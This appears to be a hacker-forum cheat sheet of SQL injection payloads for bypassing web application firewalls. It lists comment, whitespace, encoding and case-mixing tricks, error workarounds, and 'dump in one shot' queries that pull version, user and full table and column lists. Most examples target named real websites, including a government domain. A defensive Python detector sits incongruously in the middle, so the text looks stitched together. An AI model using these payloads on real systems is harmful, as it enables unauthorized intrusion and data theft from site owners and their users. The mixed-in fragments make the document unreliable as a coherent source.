SQL Injection WAF Bypassing Shortcut
FB.me/Gaza.Hacker.Injector
Credit to
JaNuS18
benzi
r3dcat
Contents
•◘╚╦☆ Rule_One_For_Test_Site_To_SQL_Injection ☆╚╦◘•
1- LPAD |
2- reverse |
3- insert |
4- make_set |
5- Export Set |
6- replace |
7- Complete Information DIOS |
8- Database.Table.Column IN A Framed Table |
9- Table.Column With All Recording |
•◘╚╦☆ Rule_One_For_Test_Site_To_SQL_Injection ☆╚╦◘•
To test a site for SQL injection, you add characters after the variable's number in the site URL.
Some Examples
https://jdclement.com/en/amis.php?id=73489"
https://pizzacrust.com.pk/deals.php?id=38"
http://www.alphaonenow.org/story.php?news_id=.5597
http://www.alphaonenow.org/story.php?news_id=5597'
http://www.alphaonenow.org/story.php?news_id=\
http://www.alphaonenow.org/story.php?news_id=.5597 order by 100 -- -
Some Example
The UNION operator is used to combine the result-set of two or more SELECT statements.
1- Each SELECT statement within UNION must have the same number of columns
2- The columns must also have similar data types
3- The columns in each SELECT statement must also be in the same order
/*!00000*/
/**/
/*x*/
/**x**/
/*%26*/
/%2A%2A/
%2f**%2f
MySQL Server supports some variants of C-style comments. These enable you to write code that
includes MySQL extensions, but is still portable, by using comments of the following form :
Example ⬎
From a /* sequence to the following */ sequence, as in the C programming language. This syntax
enables a comment to extend over multiple lines because the beginning and closing sequences
need not be on the same line.
2- WhiteSpace Block
This method will apply the Find and Replace feature to replace blank spaces with nothing or
underscore/dash/comma/%0a from selected cells easily.
%0a
%0b
%0d
%C0
%20
%09
%0c
%a0
Example ⬎
PHP Code:
And%a01 Uni On%a0dIstiNctRoW SeL EcT
PHP Code:
%0duni on%0dsel ect%0d
The firewall blocks the combined use of union and select, so the WAF bypass has to be applied
between the words union and select.
Query ⬎
And/**/.0union/*%26*/distinctROW+select
And .0UnIOn-- -%0ASeLe%43t
or .0union/**/distinctrow select/**/distinctrow
And .0union/**/distinctrow select/**/distinctrow
id=1.unioN/**/distinct%20%73eleCt""a
id=1%.0unioN/**/distinct%20%73eleCt+-!~
id=1%""unioN/**/distinct%20%73eleCt@$%
id=1%''unioN/**/distinct%20%73eleCt@%C0%
id=1-.0unioN/**/distinct%20%73eleCt@%C0/
id=1=\NunioN/**/distinct%20%73eleCt@%FF|
id=1<0.unioN/**/distinct%20%73eleCt@=
id=1>0.unioN/**/distinct%20%73eleCt~.
id=1e0unioN/**/distinct%20%73eleCt""$
id=1^0.unioN/**/distinct%20%73eleCt!~
id=1|""unioN/**/distinct%20%73eleCt\N$
id=1|''unioN/**/distinct%20%73eleCt\N%FF
id=1|.0unioN/**/distinct%20%73eleCt!@
id=1|\NunioN/**/distinct%20%73eleCt""/
space %20
! %21
" %22
# %23
$ %24
% %25
& %26
' %27
( %28
) %29
* %2A
Example ⬎
Letter case (or just case) is the distinction between the letters
that are in larger upper case (also uppercase, capital letters,
capitals, caps, large letters, or more formally majuscule) and
smaller lower case (also lowercase, small letters, or more formally
minuscule) in the written representation of certain .
Example ⬎
Union Select
unioN seleCt
UNIoN SELeCt
6- Gear Fourth
Query ⬎
or .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow
And .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow
or .0union/**/distinctrow
%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow
And .0union/**/distinctrow
%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow
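Seen from the filtering side, the comment, whitespace, URL-encoding, letter-case and `%23...%0a` variants listed above all reduce to the same token stream once the value is canonicalized. The following is an added example, not part of the original document: a signature applied to the raw value misses every sample, while the same signature applied after canonicalization matches. The function names are hypothetical, treating `%a0` and `%C0` as separators is a conservative assumption, and the sample values are copied or shortened from the payload lists on this page.

```python
import re
from urllib.parse import unquote_to_bytes


def naive_filter(raw: str) -> bool:
    """Signature applied to the raw value, as a simple filter rule might do."""
    return re.search(r"union\s+select", raw, re.I) is not None


def canonicalize(raw: str) -> str:
    """Reduce a parameter value to the token stream the SQL parser would see."""
    # '+' is a space in query strings; convert it before %2b can decode to '+'.
    data = raw.replace("+", " ").encode("latin-1", "replace")
    for _ in range(3):  # bounded re-decoding also catches double encoding
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    text = data.decode("latin-1")  # one byte -> one character, never fails
    # /*!50000union*/ is an executable comment: keep the body, drop the wrapper.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    # Ordinary /* ... */ comments only separate tokens.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    # '#' and '-- ' comments run to the end of the line ("%23junk%0a").
    text = re.sub(r"(?:#|--(?=\s))[^\n]*", " ", text)
    # Collapse every separator byte from the page's whitespace list into one space.
    text = re.sub(r"[\s\xa0\xc0]+", " ", text)
    return text.lower().strip()


# No leading \b: in ".0union" or "1e0union" a numeric literal is fused onto the
# keyword, so a word-boundary anchor before "union" would never match.
UNION_SELECT = re.compile(r"union(?: (?:all|distinctrow|distinct))?[ (]*select\b")


def detect(raw: str):
    """Return the matched canonical fragment, or None when nothing matches."""
    m = UNION_SELECT.search(canonicalize(raw))
    return m.group(0) if m else None


# Values copied or shortened from the payload lists on this page.
SAMPLES = [
    "And/**/.0union/*%26*/distinctROW+select",
    "And .0UnIOn-- -%0ASeLe%43t",
    'id=1.unioN/**/distinct%20%73eleCt""a',
    "or .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow",
    "id=-52+/*!50000unION*/+/*!50000SEleCT*/+1,2",
]
# Constructed benign values that must not be flagged.
BENIGN = ["id=73489", "title=Credit+union+news"]

if __name__ == "__main__":
    for s in SAMPLES + BENIGN:
        print(f"naive={naive_filter(s)!s:5} canonical={detect(s)!r:28} {s}")
```

Matching of this kind is a detection layer only; the injection itself is closed by binding the id value as a typed parameter in the query.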
Example ⬎
Query ⬎
ID=.4||!{f`id`}union-- a%0Aselect@
|| means "or" .
Example ⬎
http://www.bellajoias.com.br/categoria.php?id={f -3}union-- a
%0Aselect@,2,3,4,5,6,7#
☆¸.•*☆ :: Public Error Solution :: ☆*•.¸☆
Query ⬎
id=.1union-- a%0Aselect
id=1-.1union- a%0Aselect
id=1'e0union- a%0Aselect
id=\Nunion- a%0Aselect
id=1 *9e0union-- -%0aselect
Example ⬎
It happens because the URL table and our table have different
collations.
Example ⬎
ascii
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2312
armscii8
ascii
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8
3- unhex(hex(value))
4- uncompress(compress(version()))
5- aes_decrypt(aes_encrypt(value,1),1)
6- binary(value)
Solution ⬎
Example ⬎
www.i2t2.com/index1.php?id=2'
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))
+having+min(0)+or+1-- -
5- Error Name : Fatal Error Occurred
Example ⬎
To bypass this error, I null the columns one by one until
I see a good login with the vulnerable column number in the page.
When this error appears while you are using union select, the
solution will be like this example.
Error 404 Not Found is a very common error, but when it appears while
you use the query to get table name information, it means the WAF blocks the dot (.) in
information_Schema.tables
Example ⬎
The site works fine, but when I try to get the table name I get error
404 Not Found, as you see.
The server does not meet one of the preconditions that the requester
put on the request.
Example ⬎
The solution is to delete the space between group and the
variable number, like this:
http://www.lict.gov.bd/oldlict/archivesDetails.php?id=.8group By
100-- -
But if this error appears with your full query, like here:
http://www.lict.gov.bd/oldlict/archivesDetails.php?id=.8 /*!
50000Union*/ Select 1,unhex(hex(/*!50000ConCat*/(version(),/*!
50000ConCat*/(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!
50000From*/%0A/*!50000Information_Schema*/.Columns where
table_schema=database() and @c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!
50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c)))),3,4,5
1- unhex(hex(/*!50000ConCat*/(version(),/*!50000ConCat*/
(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!50000From*/%0A/*!
50000Information_Schema*/.Columns where table_schema=database() and
@c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c))))
9- Error 418 Unused
Example ⬎
concat/*!((/*!00000select*/(@)/*!from*/(/*!00000select*/(@:=0x00),
(/*!00000select*/(@)/*!00000from*/(/*!00000information_schema*/ .
schemata)/*!00000where*/(@)in(@:=concat/*!
(@,0x3c62723e,unhex(hex(schema_name))))))x))*/
(select @ from(select+@:=0x00,
(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)
(/*!50000select*/ @ /*!50000from*/(/*!50000select*/+@:=0x00,(/*!
50000select*/+@+/*!50000from*/+/*!50000information_schema*/ . /*!
50000Columns*/ /*!50000where*/ /*!50000table_schema*/=/*!
50000database*//**/() and+@:=/*!50000concat*/(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)
uncompress(compress((select @ from(select+@:=0x00,
(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)))
http://www.risler.com.ar/news.php?id=-6' union select
1,concat('BlackRose :: ',0x2e,'..Version :: ' ,
0x2e,version(),0x2e,'..User :: ',0x2e,user(),0x2e,'..Database ::
',0x2e,database(),0x2e,'..Dios :: ',0x2e,(select @
from(select+@:=0x00,(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)),3,4-- -
10- ERROR 502 - BAD GATEWAY
This error blocks the query; to bypass it you just need
to use unhex(hex(query)).
Example ⬎
http://arashidynamics.com/products_detail.php?id=-52+/*!50000unION*/
+/*!50000SEleCT*/
+1,2,unhex(hex(schema_name)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1
9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4
2,43,44+from+/*!information_schema*/.schemata+/*!12345LiMit*/ 1,1--
11- Error: (1054) Unknown column 'xxx' in 'field list'
As you can see in this error, there is no 'xxx' column in the query;
it's `xxx`.
Normal Example ⬎
http://www.icast.org.in/news/related.php?id=.24990' union
select 1,2,3,4,5,6,7,8,9,10,11-- -
Now there is an error with our query: Illegal mix of collations. It
happens because the URL table and our table have different
collations; the solution is to use convert.
Version is 4.1.7-log
12- Query failed: Unknown column '1' in 'order clause'
Example ⬎
http://www.outsourcing-today.ro/articol.php?id=6642' order by 1 -- -
So when you see this error, it means you need to limit your
subquery to only one result row: +limit+0,1 .
Example ⬎
www.xxx.com/products.php?catid=101+UNION+SELECT+1,2,
(select+llitemnumber+from+orders),4,5,6,7--
www.xxx.com/products.php?catid=101+UNION+SELECT+1,2,
(select+id+from+categories LIMIT 0,1),4,5,6,7--
14- The Injection Is Before ^ from mode
Example ⬎
https://www.tirol-taxi.at/index.php?lID=1'
1064: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '\' AS name, subtitle_1\' AS sub, seoname_1\' AS seoname,
template, content_1\' A' at line 1
When we see multiple "AS" and commas, we know the injection is before
"from": the injection is inside "select" and before "from", so we can
use the I.Q.D method ('inject the query directly') without using a
union-based query.
https://www.tirol-taxi.at/index.php?lID=1,2
15-The Injection point is after ^ From mode
Example ⬎
When I try to extract data from the column by using Polygon(), I get the error 'Operand should
contain 1 column' because my inner query is returning two columns.
Example ⬎
http://www.soarland.com/CF_Card_Adapter-catalog-41 and
polygon((select * from(select * from
C277915_shledlights.snh_base_admin)p)).html
select * from
select 1 from
http://www.soarland.com/CF_Card_Adapter-catalog-41 and
polygon((select 1 from(select * from
C277915_shledlights.snh_base_admin)p)).html
17- Error as New Line
Example ⬎
www.purichpublishing.com/?
module=swm_ecommerce&page=product_detail&categoryID=3' and 0 union
select 1,2,3,4,5,6,7-- -
DEBUGING MODE...
There was an error in the SWM MySQL query. Here's some debug information:
because the meaning of this line is just order by the c column of the URL query.
Because this query continues onto a new line, we can't use -- or %23, since
that is the same as --%0a,
and the solution is to add a comment-out query only, like
%60 = `
www.arceducation.ac/newsdetails.php?newsId=5
www.diabor.it/en/new.php?id=6
☆¸.•*☆ :: Dios that’s solution for some error :: ☆*•.¸☆
(/*!50000select*/ @ /*!50000from*/(/*!50000select*/+@:=0x00,(/*!
50000select*/+@+/*!50000from*/+/*!50000information_schema*/ . /*!
50000Columns*/ /*!50000where*/ table_schema=database() and+@:=/*!
50000concat*/(@,/*!50000table_schema*/,0x2e,/*!
50000Table_name*/,0x2e,/*!50000Column_name*/,0x0a)))a)
(/*!50000select*/ @ /*!50000from*/(/*!50000select*/+@:=0x00,(/*!
50000select*/+@+/*!50000from*/+/*!50000information_schema*/ . /*!
50000Columns*/ /*!50000where*/ /*!50000table_schema*/=/*!
50000database*//**/() and+@:=/*!50000concat*/(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)
| White Page |
(/*!50000SELECT*/+(@x)+/*!50000%46rom*/+(/*!50000SELECT*/+(@x:=0x00),
(@NR_DB:=0),(/*!50000SELECT*/+(0)+/*!50000%46rom*/+(/*!
50000INFORMATION_SCHEMA.columns*/ )+WHERE+(@x)+IN+(@x:=/*!
12345CONCAT(@x,LPAD(@NR_DB:=@NR_DB
%2b1,2,0x30),0x20203a2020,table_schema,0x3a,table_name,0x3a,column_na
me,0x3c62723e)*/)))x)
make_set(6,@:=0x0a,(/*!00000select*/%0b(1)%0b/*!00000%66rom*/%0b(%23H
%0a/*!00000%69nformation_schema*/%0b.%0bcolumns)%0bwhere
%0b@:=make_set(511,@,0x3c6c693e,/*!00000table_schema*/,0x203a3a20,/*!
00000table_name*/,0x203a3a20,/*!00000column_name*/)),@)
| Source Down |
concat(0x223e,version())
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e,version(),0x3c696d67207372633d22)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
concat(0x223e,0x3c62723e3c62723e3c62723e,version(),0x3c696d6720737263
3d22,0x3c62723e)
| Illegal Mix Of Collations Error |
1- Illegal Mix
unhex(hex(/*!50000ConCat*/(version(),/*!50000ConCat*/
(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!50000From*/%0A/*!
50000Information_Schema*/.Columns where table_schema=database() and
@c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c))))
2- Unused
uncompress(compress((select @ from(select+@:=0x00,
(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)))
3- White Page
aes_decrypt(aes_encrypt((/*!50000SELECT*/+(@x)+/*!50000FROM*/+(/*!
50000SELECT*/+(@x:=0x00),(@NR_DB:=0),(/*!50000SELECT*/+(0)+/*!
50000FROM*/+(/*!50000INFORMATION_SCHEMA.columns*/ )+WHERE+(@x)+IN+
(@x:=/*!12345CONCAT(@x,LPAD(@NR_DB:=@NR_DB
%2b1,2,0x30),0x20203a2020,table_schema,0x3a,table_name,0x3a,column_na
me,0x3c62723e)*/)))x),1),1)
| Precondition Failed |
☆¸.•*☆ :: SQLI Dios Query :: ☆*•.¸☆
| LPAD |
LPAD(concat('..Name :: BlackRose',0x203a3a20,0x2e,'<br>','..Version ::
',version(),0x3c62723e,'..Database :: ',database(),0x3c62723e,'..User :: ',user(),0x2e,'<br>',
(select(@x)f%72om(select(@x:=0x00),(select(0)f
%72om(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat
+(@x,0x3c62723e,table_schema,0x203a20,table_name,0x203a20,column_name))))x)),10000,0x00)
| reverse |
(select reverse(insert(0x1,1,0,reverse(concat
(unhex(hex(group_concat(0x3c6c693e,table_schema,0x203a3a20,Table_name,0x203a3a20,Colum
n_name))),0x3c62723e))))+from information_schema 0.e.columns where
table_schema=database())
| insert |
insert(insert(insert(insert(insert(insert(insert(insert(insert(insert((select(@a)from(select(@a:=0x0
0),(select(@a)from(information_schema.columns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=insert(0x3c2f666f6e743e,1,0,insert(
@a,1,0,insert(column_name,1,0,insert(0x203a3a20,1,0,insert(table_name,1,0,0x3c62723e))))))))a),
1,0,database()),1,0,0x4461746162617365203a3a20),1,0,0x3c62723e),1,0,user()),1,0,0x55736572203
a3a20),1,0,0x3c62723e),1,0,version()),1,0,0x56657273696f6e203a3a20),1,0,0x3c62723e),1,0,0x496e
6a656374656420427920426c61636b526f7365)
| make_set |
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where
@:=make_set(511,@,0x3c6c693e,table_schema,0x203a20,table_name,0x203a20,column_name)),
@)
make_set(6,@:=0x0a,(/*!00000select*/(1)/*!00000from*/(/*!00000information_schema*/ .
columns)where@:=make_set(511,@,0x3c6c693e,/*!00000table_schema*/,0x203a3a20,/*!
00000table_name*/,0x203a3a20,/*!00000column_name*/)),@)
| Export Set |
export_set(5,@:=0,(select
count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0
x3c6c693e,2),column_name,0xa3a,2)),@,2)
export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!
50000information_schema*/.columns+where@:=export_set%285,export_set
%285,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns
where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/*!
50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
| replace |
replace(replace(0x21402324255e262a3f2b22,0x21,(select concat_ws(0x00,
(select(@)from(select(@:=0x00),
(select(@)from(information_schema.columns)where(table_schema=database())and(0x00)in(@:=c
oncat_ws(0x00,(@),(0x3c62723e),(table_schema),(0x203a3a20),(table_name),(0x203a3a20),
(column_name)))))x)))),0x40,0x3c62723e)
replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x753c62723e763c62
723e773c62723e78,0x75,0x3c666f6e7420636f6c6f723d7265642073697a653d3530303e496e6a65637
46f72426f793c2f666f6e743e3c62723e),0x76,version()),0x77,user()),0x78,database())),0x24,
(select+count(*)from(information_schema.columns)where+table_schema=database()
+and@:=replace(replace(replace(0x03c62723e2a3a3a2d,0x00,@),0x2a,table_name),0x2d,column_
name))),0x25,@)
| Complete Information DIOS |
..Name :: Pishicat_Injector
..Version :: 5.6.31-log
..User :: gasp_r@%
..Database :: gasp_gaspco1
Databases :~ [383]
Tables :~ [94]
Columns :~ [870]
1. CHARACTER_SET_NAME
2. DEFAULT_COLLATE_NAME
| Table.Column With All Recording |
Regards
Ahmed El Melegy
https://www.facebook.com/Melegy.GHI